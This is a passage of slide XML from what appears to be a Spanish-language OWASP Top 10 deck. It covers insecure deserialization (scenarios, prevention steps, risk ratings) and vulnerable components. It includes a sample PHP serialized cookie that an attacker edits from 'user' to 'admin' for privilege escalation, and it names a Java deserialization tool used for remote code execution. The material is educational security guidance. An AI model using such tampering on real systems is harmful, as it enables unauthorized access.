                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #1</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una aplicación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>React</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> invoca a un conjunto de microservicios </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Spring Boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Siendo programadores funcionales, intentaron asegurar que su código sea inmutable. La solución a la que llegaron es serializar el estado del usuario y pasarlo en ambos sentidos con cada solicitud. Un atacante advierte la firma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“R00”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> del objeto Java, y usa la herramienta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java Serial Killer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>para obtener ejecución de código remoto en el servidor de la aplicación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>un foro PHP utiliza serialización de objetos PHP para almacenar una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“super cookie”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, conteniendo el ID, rol, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>de la contraseña y otros estados del usuario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="88900">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Un atacante modifica el objeto serializado para darse privilegios de administrador a sí mismo:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="88900">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“;i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}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AppSecUSA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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Externos</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Unmarshaller Security</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AppSec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300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El único patrón de arquitectura seguro es no aceptar objetos serializados de fuentes no confiables o utilizar medios de serialización que sólo permitan tipos de datos primitivos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Si esto no es posible, considere alguno de los siguientes puntos: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Implemente verificaciones de integridad tales como firmas digitales en cualquier objeto serializado, con el fin de detectar modificaciones no autorizadas.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Durante la deserialización y antes de la creación del objeto, exija el cumplimiento estricto de verificaciones de tipo de dato, ya que el código normalmente espera un conjunto de clases definibles. Se ha demostrado que se puede pasar por alto esta técnica, por lo que no es aconsejable confiar sólo en ella.</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Aísle el código que realiza la deserialización, de modo que se ejecute en un entorno con los mínimos privilegios posibles.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Registre las excepciones y fallas en la deserialización, tales como cuando el tipo recibido no es el esperado, o la deserialización produce algún tipo de error.</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Restrinja y monitoree las conexiones (I/O) de red desde contenedores o servidores que utilizan funcionalidades de deserialización.</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Monitoree los procesos de deserialización, alertando si un usuario deserializa constantemente.</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A8</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t>Deserialización Insegura</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0"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24714702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Explotabilidad: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalencia: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectabilidad: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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9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Técnico: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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Lograr la explotación de deserialización es difícil, ya que los </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>exploits</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> distribuidos raramente funcionan sin cambios o ajustes en su código fuente.</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es-AR" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Este ítem se incluye en el Top 10 basado en una </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>encuesta a la industria </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>y no en datos cuantificables. Algunas herramientas pueden descubrir defectos de deserialización, pero con frecuencia se necesita ayuda humana para validarlo.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Se espera que los datos de prevalencia de estos errores aumenten a medida que se desarrollen más herramientas para ayudar a identificarlos y abordarlos.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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s-AR" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No se debe desvalorizar el impacto de los errores de deserialización. Pueden llevar a la ejecución remota de código, uno de los ataques más serios posibles.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El impacto al negocio depende de las necesidades de la aplicación y de los datos.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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>típicamente, los componentes se ejecutan con los mismos privilegios de la aplicación que los contienen y, como consecuencia, fallas en éstos pueden resultar en impactos serios. Estas fallas pueden ser accidentales (por ejemplo, errores de codificación) o intencionales (una puerta trasera en un componente). Algunos ejemplos de vulnerabilidades en componentes explotables son</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a: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t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>una ejecución remota de código en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Struts 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> que ha sido culpada de grandes brechas de datos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Aunque frecuentemente los dispositivos de Internet de las Cosas (IoT) son imposibles o muy dificultosos de actualizar, la importancia de éstas actualizaciones puede ser enorme (por ejemplo en dispositivos biomédicos).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Existen herramientas automáticas que ayudan a los atacantes a descubrir sistemas mal configurados o desactualizados. A modo de ejemplo, el motor de búsqueda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ayuda a descubrir dispositivos que aún son vulnerables a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, la cual fue parcheada en abril del 2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Es potencialmente vulnerable si:</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No conoce las versiones de todos los componentes que utiliza (tanto del lado del cliente como del servidor). Esto incluye componentes utilizados directamente como sus dependencias anidadas.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El software es vulnerable, no posee soporte o se encuentra desactualizado. Esto incluye el sistema operativo, servidor web o de aplicaciones, DBMS, APIs y todos los componentes, ambientes de ejecución y bibliotecas.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No se analizan los componentes periódicamente ni se realiza seguimiento de los boletines de seguridad de los componentes utilizados.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No se parchea o actualiza la plataforma subyacente, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="880" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>frameworks </a:t>
